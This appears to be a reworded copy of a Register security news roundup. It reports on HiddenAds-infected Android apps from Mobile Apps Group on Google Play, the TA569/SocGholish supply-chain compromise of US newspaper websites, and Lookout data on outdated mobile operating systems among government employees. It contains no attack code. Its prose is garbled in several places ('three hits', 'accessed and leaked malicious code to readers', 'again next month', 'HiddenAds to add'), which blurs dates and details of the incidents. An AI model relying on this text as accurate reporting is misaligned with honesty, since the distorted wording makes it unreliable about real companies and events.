More malware in the Google Play Store • The Register

shortly A quartet of malware-laden Android apps from a single developer have been caught with malicious code more than once, yet the infected apps remain on Google Play and have been downloaded more than a million times.

The apps come from developer Mobile Apps Group and are infected with the trojan known as HiddenAds, security shop Malwarebytes said. It analyzed one of the Mobile Apps Group’s products, Bluetooth Auto Connect, which claims to do what its name suggests but a lot more.

A run of more than ten months with malicious code on Google Play? Maybe it’s time to say three strikes and you’re at the Mobile Apps Group

According to Malwarebytes, the app waits a few days after installation to behave maliciously. Once active, the app opens phishing sites on Chrome, ranging from harmless pay-per-click spam to sites that urge users to download updates or take action because their device has been infected.

“As a result, unlocking your phone after several hours means closing multiple tabs,” said Malwarebytes’ Nathan Collier.

Interestingly, the malware in the Mobile Apps Group .APKs was removed twice – in January 2021 and again next month – when the developer uploaded clean versions of Bluetooth Auto Connect before adding the malware back in a future update.

Collier believes the developer was likely caught by Google, which is what led to the clean uploads. Despite this, he notes that the last clean version was released on October 21, 2021, with a new malware-infected version being added to Google Play in December last year.

“In version 5.7, this malicious code remains to this day. A 10+ month run of malicious code on Google Play. Maybe it’s time to say three hits and you’re at Mobile Apps Group,” Collier said.

Google Play has hosted malicious apps in the past, with perhaps one of the most egregious cases coming to light last July when 60 apps installed by more than 3.3 million users were removed due to malware.

This isn’t even the first time HiddenAds Trojan has been found on Google Play: it was spotted on the store in 2020, while in 2021 a popular barcode scanning app installed on over 10 million devices was updated to include HiddenAds to add (and also researched by Collier).

Google has also been accused of failing to monitor malware that comes preinstalled on cheap Android devices, for which more than 50 advocacy groups have called out the company in 2020.

Attack on software supply chain hits US news media

Proofpoint Threat Research warns that more than 250 local and regional US newspaper websites accessed and leaked malicious code to readers following a software supply chain attack.

The group responsible is believed to be TA569 or SocGholish, Proofpoint said in a Twitter thread. The group has reportedly compromised an unnamed media company that delivers JavaScript ads and videos to news sites across the country “by modifying the codebase of this otherwise benign JS.”

Proofpoint has been tracking TA569 for several years and warned in 2020 that it was carrying out similar attacks via HTML injection and CMS compromise. According to Proofpoint, the end goal is infection with SocGholish malware, which disguises itself as an update file for Firefox and other web browsers.

Only the infected media companies running the ads have the real record showing how widespread the damage is, Proofpoint said, adding that compromised websites were found serving Boston, New York, Chicago, Washington, DC and others serve metro areas.

According to Proofpoint, TA569 regularly removes and adds new malicious code, “therefore the presence of the payload and malicious content can vary by the hour”, which also makes it difficult to detect.

Almost half of US government employees use outdated mobile devices

Just under half of the mobile devices used by US officials at all levels of government run outdated operating systems, according to a report examining telemetry from more than 200 million devices.

According to security firm Lookout, this includes federal, state, and local employees across the US using outdated versions of Android and iOS on their devices, with far worse numbers being reported for Android.

Ten months after Android 12 was released, only 67 percent of federal devices and 54 percent of state/local devices were running the current version. Android 11 was on about 15 percent of devices at all levels of government, while more than 10 percent of state and local devices were still running Android 9.

The only large group of iOS devices not running iOS 15 (the latest version during the data period) were state and local devices, about a quarter of which were still running iOS 14 ten months after iOS 15 was released.

But cybercriminals looking to access government devices are turning away from malware and toward simply collecting credentials, meaning these legacy operating systems may not be responsible for threat actors gaining a foothold in US government agencies.

About 50 percent of phishing attacks targeting government employees attempted to steal credentials, up from about a third a year earlier, Lookout said. One piece of good news from the report is that government officials appear to be learning their lesson from phishing.

“Well over 50 percent of federal, state, and local employees who received a notification that they clicked a phishing link did not click a subsequent mobile phishing link.” ®